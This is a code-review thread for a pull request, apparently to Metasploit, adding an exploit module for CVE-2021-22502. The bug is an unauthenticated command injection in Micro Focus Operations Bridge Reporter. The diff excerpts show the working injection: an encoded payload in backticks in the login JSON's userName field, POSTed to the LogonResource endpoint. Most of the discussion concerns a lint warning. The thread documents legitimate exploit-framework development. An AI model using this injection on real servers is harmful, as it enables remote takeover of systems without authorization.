### PR TITLE
Add exploit for CVE-2021-22502: Micro Focus Operations Bridge Reporter unauthenticated command injection

### PR DESCRIPTION
**Pull request by pedrib**
This module exploits a command injection vulnerability on *login* (yes, you read that right) that affects Micro Focus Operations Bridge Reporter on Linux, versions 10.40 and below.
It's a straight up command injection, with little escaping required and it works before authentication.
This module has been tested on the Linux 10.40 version. Older versions might be affected, check the advisory for details.

https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md

Will send a pcap soon!

### CODE REVIEW

**Comment by pedrib** [comment]
ok so it's failing with 
```
 W: 81:  8: Lint/UselessAssignment: Useless assignment to variable - timeout.
W:107:  8: Lint/UselessAssignment: Useless assignment to variable - timeout.
```

But this is not useless! If I don't use timeout, it will hang waiting for a response!

File: modules/exploits/linux/http/microfocus_obr_cmd_injection.rb [hunk 1]
```diff
@@ -0,0 +1,116 @@
...
+
+    # we use 0x60 (`) for injection, but there are lots of other possibilities
+    data = "{\"userName\":\"#{rand_text_alpha(1..16)}`#{payload_enc}`\",\"credential\":\"#{rand_text_alpha(8..20)}\"}"
+
+    send_request_raw({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], '/AdminService/urest/v1/LogonResource'),
+      'headers' => { 'Content-Type' => 'application/json' },
+      'data' => data
+    }, timeout = 0)
```
Comment (gwillcox-r7) [inline modules/exploits/linux/http/microfocus_obr_cmd_injection.rb:107]:
```suggestion
    # rubocop:disable Lint/UselessAssignment
    send_request_raw({
      'method' => 'POST',
      'uri' => normalize_uri(datastore['TARGETURI'], '/AdminService/urest/v1/LogonResource'),
      'headers' => { 'Content-Type' => 'application/json' },
      'data' => data
    }, timeout = 0)
    # rubocop:enable Lint/UselessAssignment
```

Comment (gwillcox-r7) [reply modules/exploits/linux/http/microfocus_obr_cmd_injection.rb:107]: Either do that or remove the assignment to the timeout variable. as the function should know its the timeout variable from its positioning in the argument list.

File: modules/exploits/linux/http/microfocus_obr_cmd_injection.rb [hunk 2]
```diff
@@ -0,0 +1,116 @@
...
+    )
+  end
+
+  def check
+    res = send_request_raw({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], '/AdminService/urest/v1/LogonResource'),
+      'headers' => { 'Content-Type' => 'application/json' },
+      'data' => rand_text_alpha(10..64)
+    }, timeout = 10)
```
Comment (gwillcox-r7) [inline modules/exploits/linux/http/microfocus_obr_cmd_injection.rb:81]: Either:
```suggestion
    res = send_request_raw({
      'method' => 'POST',
      'uri' => normalize_uri(datastore['TARGETURI'], '/AdminService/urest/v1/LogonResource'),
      'headers' => { 'Content-Type' => 'application/json' },
      'data' => rand_text_alpha(10..64)
    }, 10)
```

Or

```suggestion
    # rubocop:disable Lint/UselessAssignment
    res = send_request_raw({
      'method' => 'POST',
      'uri' => normalize_uri(datastore['TARGETURI'], '/AdminService/urest/v1/LogonResource'),
      'headers' => { 'Content-Type' => 'application/json' },
      'data' => rand_text_alpha(10..64)
    }, timeout = 10)
    # rubocop:enable Lint/UselessAssignment
```

**Comment by pedrib** [comment]
@gwillcox-r7 thank you very much, applied your fixes!

**Comment by pedrib** [comment]
Ended up removing the timeout = 
Tested it on the target, all good

pcaps to follow

**Comment by wvu-r7** [comment]
Sometimes I hate Ruby.

**Comment by wvu-r7** [comment]
FWIW, if you're writing new code, [keyword arguments](https://github.com/rubocop/ruby-style-guide#keyword-arguments-vs-optional-arguments) are greatly preferred.

**Comment by jmartin-r7** [comment]
@msjenkins-r7 test this please.

**Comment by pedrib** [comment]
Pcaps sent to msfdev@
For this and PR #15087

**Comment by smcintyre-r7** [comment]
Everything looks good to me, I also reviewed the PCap that was shared with us. I really appreciate the verbose comments in the module, they make things really easy to understand :+1: I also see that the feedback has been addressed so I think this is ready to be landed now.

**Comment by smcintyre-r7** [comment]
# Release Notes
This adds an exploit for CVE-2021-22502 which is an unauthenticated OS command injection vulnerability in the Micro Focus Operations Bridge Reporter.

**Comment by pedrib** [comment]
awesome, thank you!

**Pull request merged**